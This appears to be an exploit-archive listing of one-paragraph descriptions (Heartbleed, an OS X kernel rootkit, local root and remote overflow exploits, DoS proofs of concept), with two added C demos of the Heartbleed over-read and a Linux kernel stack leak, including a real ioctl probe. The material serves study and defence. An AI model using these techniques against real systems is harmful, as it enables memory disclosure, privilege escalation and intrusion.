SedSystems D3 Decimator suffers from default credential and local file disclosure vulnerabilities.
30e71a2e924700d68946538cff7d0f87bb02615b8297043b63f0dbb2275f4336
This exploit uses OpenSSL to create an encrypted connection and trigger the Heartbleed leak. The leaked information is returned encrypted (which also hinders IDS and forensic inspection) and is then decrypted, decompressed and written to a file. The heartbeat payload length can be set arbitrarily, or one of two preset values (0x00 and the maximum length) can be used. The vulnerability occurs because no bounds checking is performed on the user-supplied payload length: the heartbeat response copies that many bytes from the heap back to the user as part of the DTLS/TLS heartbeat extension, regardless of how much data was actually sent. All versions of OpenSSL from 1.0.1 to 1.0.1f are known to be affected. You must run this against a target that is linked to a vulnerable OpenSSL library and speaks DTLS/TLS.
68bcedd2a727967e92d3a342ff6f366dc236929be5c2a5f69dba9ed2c35f299a
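The missing bounds check behind Heartbleed, as an added example that is not the exploit's own code: a heartbeat message is built with a claimed payload length larger than the bytes actually sent, then handed to a responder that mirrors the logic of OpenSSL's tls1_process_heartbeat() before and after the 1.0.1g fix. The "arena" array standing in for the server heap, the secret string placed next to the record, and the function names are all constructed for the demonstration.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define TLS1_HB_REQUEST  1
#define TLS1_HB_RESPONSE 2
#define HB_PADDING       16
/* Large enough that even a 0xffff claimed length stays inside the arena. */
#define ARENA_SIZE       (3 + 0xffff + HB_PADDING + 1)

/* Constructed heap "arena": the heartbeat record sits at the start, and
 * unrelated data that a real server would hold in neighbouring allocations
 * (session cookies, request bodies, key material) sits a little further on. */
static uint8_t arena[ARENA_SIZE];
static const char secret[] = "Cookie: session=SUPERSECRET";

/* Write a heartbeat request: type | 16-bit claimed length | payload | padding.
 * claimed_len may exceed real_len; that mismatch is the whole bug. */
size_t build_heartbeat(uint8_t *out, uint16_t claimed_len,
                       const uint8_t *payload, size_t real_len)
{
    out[0] = TLS1_HB_REQUEST;
    out[1] = (uint8_t)(claimed_len >> 8);
    out[2] = (uint8_t)(claimed_len & 0xff);
    memcpy(out + 3, payload, real_len);
    memset(out + 3 + real_len, 0, HB_PADDING);
    return 3 + real_len + HB_PADDING;        /* bytes actually on the wire */
}

/* Vulnerable responder, modelled on OpenSSL 1.0.1 to 1.0.1f: reads the
 * 16-bit length from the message and copies that many bytes back without
 * ever comparing it against the length of the record it arrived in. */
size_t respond_vulnerable(const uint8_t *rec, size_t rec_len, uint8_t *out)
{
    (void)rec_len;                            /* never consulted: the bug */
    uint16_t payload = (uint16_t)((rec[1] << 8) | rec[2]);
    out[0] = TLS1_HB_RESPONSE;
    out[1] = rec[1];
    out[2] = rec[2];
    memcpy(out + 3, rec + 3, payload);        /* over-reads past the record */
    memset(out + 3 + payload, 0, HB_PADDING);
    return 3 + payload + HB_PADDING;
}

/* Fixed responder, modelled on the 1.0.1g check: returns 0 (no response)
 * when header + claimed payload + padding would exceed the record length. */
size_t respond_fixed(const uint8_t *rec, size_t rec_len, uint8_t *out)
{
    if (rec_len < 1 + 2 + HB_PADDING)
        return 0;
    uint16_t payload = (uint16_t)((rec[1] << 8) | rec[2]);
    if (1 + 2 + (size_t)payload + HB_PADDING > rec_len)
        return 0;                             /* silently discard */
    out[0] = TLS1_HB_RESPONSE;
    out[1] = rec[1];
    out[2] = rec[2];
    memcpy(out + 3, rec + 3, payload);
    memset(out + 3 + payload, 0, HB_PADDING);
    return 3 + payload + HB_PADDING;
}

/* Does the response carry the neighbouring secret? */
int leaks_secret(const uint8_t *buf, size_t len)
{
    size_t n = strlen(secret);
    for (size_t i = 0; i + n <= len; i++)
        if (memcmp(buf + i, secret, n) == 0)
            return 1;
    return 0;
}

/* Send one request with the given claimed length to both responders.
 * Returns 1 if the vulnerable responder leaked the secret; *fixed_len
 * receives the fixed responder's response length (0 means dropped). */
int demo(uint16_t claimed_len, size_t *fixed_len)
{
    static uint8_t out[3 + 0xffff + HB_PADDING];
    const uint8_t payload[] = "hi";           /* two real payload bytes */

    memset(arena, 0, sizeof arena);
    size_t rec_len = build_heartbeat(arena, claimed_len, payload, 2);
    memcpy(arena + 256, secret, sizeof secret);   /* "adjacent" heap data */

    size_t vlen = respond_vulnerable(arena, rec_len, out);
    int leaked = leaks_secret(out, vlen);
    *fixed_len = respond_fixed(arena, rec_len, out);
    return leaked;
}

int main(void)
{
    size_t fl;
    printf("claimed 0x4000: vulnerable leaks secret = %d, fixed response = %zu bytes\n",
           demo(0x4000, &fl), fl);
    printf("claimed 2:      vulnerable leaks secret = %d, fixed response = %zu bytes\n",
           demo(2, &fl), fl);
    return 0;
}
```

With a claimed length of 0x4000 the vulnerable responder copies 16384 bytes from a 21-byte record and the secret comes back with them; the fixed responder drops the message. An honest request (claimed length equal to the two bytes sent) is answered by both, which is why the fix does not break legitimate heartbeats.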
This is a whitepaper discussing arbitrary java code execution leveraging the Java Debugging Wire Protocol (JDWP).
0adc9316e503d0fe3daa7da5e64d578c4f345eb5aeee58462a82afd7494b1a6d
The MobileIron VSP appliance provides a restricted "clish" Java application that can be used to perform a minimal amount of configuration and requires an "enable" password for elevated privileges. Probing under the hood of this shell shows that certain commands are run on the native Linux OS with sudo; the "show processes" command reveals the commands being used. Due to a lack of input sanitization, it is possible to run arbitrary commands as root.
b4ff0c23630c23454621f19b315444b641a2dc3df5ce86782a719ea37d53d3e6
This is the Cisco ASA Ethernet information leak exploit that leverages the vulnerability noted in CVE-2003-0001. Versions prior to 8.4.4.6 and 8.2.5.32 are affected.
ada92ec408b17ad98b8a34bbb874aa0239b2511cafe8e2286f516be9b06a52b8
This is a 64-bit Mac OS X kernel rootkit that uses no hardcoded addresses to hook the BSD subsystem on OS X Lion and below. It uses a combination of syscall hooking and DKOM to hide activity on a host. String resolution of symbols no longer works on Mountain Lion because the symtab is destroyed during load; this code is portable across Lion and below but requires reworking to hook under Mountain Lion.
b104cfd2f826400eb9d8d5a81941ae270ed54b62ebfb9893fc474185b717dd60
MS11-083 denial of service proof of concept exploit. It attempts to trigger the ICMP reference count overflow in the TCP/IP stack of Windows 7, Vista and Windows Server 2008 hosts. This requires sending 2^32 (4,294,967,296) UDP packets to a closed port on the host; the dereference that completes the overflow is not triggered by the UDP packets themselves but by ICMP echo packets. This exploit creates 250 threads, floods the host with UDP packets and then attempts to trigger the dereference using ping.
8599b0b1ac07fed75a167b44758ada7368eb687ba515c6c1f6c4ea9d3e84cbf4
These are slides from a talk called Hacking Embedded Devices for Fun and Profit. It uses Sky Broadband as a case study.
c47817875f30772c127c3169814a0db083ad87a06d51af5acdb3128b68dce9c6
Information leak exploit for Linux kernel versions 2.6.37-rc1 and below. The kernel leaks stack memory back to userland because the "reserved" member of struct serial_icounter_struct is never initialized before the struct is copied to userland. The exploit uses an ioctl to trigger the leak, dumps the result to a file and displays it on the command line.
fc5c06243bfa87c53d6e5f3c22e2104a377b95a4b22238e7d035f9b2e20066f4
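The bug class behind this leak, as an added example that is not the exploit's own code: a userland mirror of the kernel's struct serial_icounter_struct is filled the way a tty driver fills it, once without touching reserved[] and once after zeroing the whole struct, and the stale words that survive are counted. The 0xAA fill standing in for a previous stack frame, the hw_counts values and the /dev/ttyS0 path used by the real probe are all constructed or assumed; the fill routine reproduces the pattern in spirit, not the kernel source verbatim.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#ifdef __linux__
#include <fcntl.h>
#include <sys/ioctl.h>
#include <unistd.h>
#include <linux/serial.h>
#endif

/* Userland mirror of the kernel's struct serial_icounter_struct
 * (include/linux/serial.h): eleven counters followed by reserved[9]. */
struct icounter {
    int cts, dsr, rng, dcd;
    int rx, tx;
    int frame, overrun, parity, brk;
    int buf_overrun;
    int reserved[9];
};

/* Constructed stand-in for the driver's per-port hardware counters. */
struct hw_counts {
    int cts, dsr, rng, dcd, rx, tx, frame, overrun, parity, brk, buf_overrun;
};

/* The driver assigns every counter by name; nothing ever names reserved[]. */
static void fill_counters(struct icounter *out, const struct hw_counts *hw)
{
    out->cts = hw->cts;       out->dsr = hw->dsr;         out->rng = hw->rng;
    out->dcd = hw->dcd;       out->rx = hw->rx;           out->tx = hw->tx;
    out->frame = hw->frame;   out->overrun = hw->overrun; out->parity = hw->parity;
    out->brk = hw->brk;       out->buf_overrun = hw->buf_overrun;
}

/* Vulnerable pattern: the struct lives on the kernel stack, the named fields
 * are filled, and the whole struct (reserved[] included) is copied out. */
void get_icount_vulnerable(struct icounter *out, const struct hw_counts *hw)
{
    fill_counters(out, hw);            /* reserved[] keeps whatever was there */
}

/* Fixed pattern: zero the whole struct first so no bytes from a previous
 * stack frame reach userland through the copy. */
void get_icount_fixed(struct icounter *out, const struct hw_counts *hw)
{
    memset(out, 0, sizeof *out);
    fill_counters(out, hw);
}

/* Simulate the leak: pre-fill the "stack slot" with 0xAA bytes standing in
 * for stale data, run one of the two routines, and count reserved[] words
 * that still carry it. Returns 9 for the vulnerable path, 0 for the fix. */
size_t stale_reserved_words(int use_fixed)
{
    struct icounter ic;
    memset(&ic, 0xAA, sizeof ic);      /* constructed stale stack contents */
    struct hw_counts hw = { 1, 0, 0, 1, 4096, 2048, 0, 0, 0, 0, 0 };

    if (use_fixed)
        get_icount_fixed(&ic, &hw);
    else
        get_icount_vulnerable(&ic, &hw);

    size_t stale = 0;
    for (size_t i = 0; i < sizeof ic.reserved / sizeof ic.reserved[0]; i++)
        if (ic.reserved[i] != 0)
            stale++;
    return stale;
}

/* The probe the exploit performs for real: TIOCGICOUNT on a serial tty,
 * then a dump of reserved[]. Returns -1 if the device or ioctl is unavailable
 * (non-Linux host, no serial port, or a kernel that already zeroes the struct
 * still returns 0 here, just with all-zero words). */
int probe_tty(const char *dev)
{
#if defined(__linux__) && defined(TIOCGICOUNT)
    struct serial_icounter_struct sic;
    int fd = open(dev, O_RDONLY | O_NOCTTY | O_NONBLOCK);
    if (fd < 0)
        return -1;
    if (ioctl(fd, TIOCGICOUNT, &sic) < 0) {
        close(fd);
        return -1;
    }
    close(fd);
    for (size_t i = 0; i < 9; i++)
        printf("reserved[%zu] = 0x%08x\n", i, (unsigned)sic.reserved[i]);
    return 0;
#else
    (void)dev;
    return -1;
#endif
}

int main(void)
{
    printf("vulnerable fill: %zu stale reserved words\n", stale_reserved_words(0));
    printf("fixed fill:      %zu stale reserved words\n", stale_reserved_words(1));
    probe_tty("/dev/ttyS0");           /* device path is an assumption */
    return 0;
}
```

The simulated half is what makes the defect visible on any machine; the probe_tty() half is the real ioctl the exploit issues and only shows stale data on an affected kernel with a serial device present.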
Linux kernel versions 2.6.37 and below local kernel denial of service exploit that leverages a divide-by-zero error in tcp_select_initial_window() when processing a user-supplied TCP_MAXSEG value.
f20e0d2ebc4ff05467a9771775dda2115edfe394b7365dba0410ad1d236a4eab
Oracle Sun Solaris 10 su NULL pointer dereference proof of concept exploit.
eba90a94a7182395d586cd8f497035232e075f309dfba27247a0e3361c6309b0
Apple Mac OS X versions 10.6.3 and below suffer from an insecure temporary file creation vulnerability in the BSD chpass utility under /etc. A user can create a file in /etc that they own with read/write permissions and populate it with arbitrary data. This could be used to fill the disk, or to write configuration file data that, combined with another flaw, could elevate local privileges.
7612d1322811886943d0e1ba838ed0c5d2209c568bc240a49eeb336f0af2080c
Mac OS X versions 10.5.6 and 10.5.7 ptrace() mutex handling denial of service exploit. Due to problems with mutex handling in ptrace(), the OS X kernel can attempt to interlock a mutex that has already been destroyed, giving rise to a race condition that results in a denial of service. This code should be run in a loop, and you may need to run it multiple times.
280d49ab7dc2a6f1d65feb29ee1a9c5ba38aedb401fb0e81e12ef3860ea1d82f
Sun VirtualBox versions 3.0.6 and below local root exploit that takes advantage of a popen() shell metacharacter injection vulnerability.
e2ddedb66eb6b5695c18761f7fb3938a54e20b5be176b2e29ef59c221c7f1e0f
This is a local root exploit for the Linux 2.6.29 ptrace_attach() race condition that allows a process to gain elevated privileges under certain conditions.
db9565192db3ee04f85227cfe9fa0b007cf4b055bb2747ed491261b3a6efd308
Citadel SMTP versions 7.10 and below remote overflow exploit.
17d73e7c5984975be22f519415b7f5914aaaa74629f78f76ee5f4586a019b28d
Windows RSH daemon versions 1.8 and below remote buffer overflow exploit.
1c530d10caf782cb1a6270dae0b0e5974153013a57ef1f83b6166717ed3a1918
Lotus Domino IMAP4 server version 6.5.4 / Windows 2000 Advanced Server x86 remote buffer overflow exploit.
b914a5a129df141a9e81efa513ca01b96c180ff72cea7dafc716b3203367e1a3
WinZip versions 10.0.7245 and below FileView ActiveX buffer overflow exploit.
13135b625739a870d46e0156520936ebef5b93a66dc0bdbacf68dd04b7de0584
GNU/Linux mbse-bbs versions 0.70.0 and below local root exploit that makes use of a stack overflow.
b9b6c8e90f30995598ab9252882b6e7bfe68361174d80d1b09bb34e24378764c
WinZIP versions 10.0.7245 and below FileView ActiveX control remote buffer overflow exploit.
a55c09bb96fdc249ab51759f91535b4960838cdf65004233a7630f189ec5dda1
WinZIP versions 10.0.7245 and below FileView ActiveX control stack overflow proof of concept exploit.
45e7ef5aa4bed66d4ed69bb7ffcbf9d14a655fc54a25b33506fdc4372ff0f652
Solaris in.telnetd versions 8.0 and prior remote exploit. A boundary condition error exists in telnet daemons derived from the BSD telnet daemon. Under certain circumstances, a buffer overflow can occur when a combination of telnet protocol options is received by the daemon: the function responsible for processing the options prepares a response in a fixed-size buffer without performing any bounds checking. This exploit has been tested against Solaris 7 and Solaris 8 (SPARC).
8b1b9e7b12ccde64848ee3e68e52d71b897094c36e01d0c6aefb642d65d2014b
SGI IRIX 6.5 /usr/sysadm/bin/runpriv local root exploit.
87ee2433cea6d25492bbf29d76ac2dddfffb1036915de7f4e24d87a028286cbe
SCO OpenServer 5.0.7 termsh exploit. termsh is a program to view or modify an existing terminal entry on SCO OpenServer. A stack-based overflow exists in the handling of command line arguments, namely the [-o oadir] argument. The binary is installed setgid auth in a default SCO OpenServer 5.0.7 install, so an attacker may use this flaw to gain write access to /etc/passwd or /etc/shadow, allowing for local root compromise.
80848a38a842001ba4c5cb1a4aa2616cfde210738c9f9ac3f9e0ec9ee9fa8266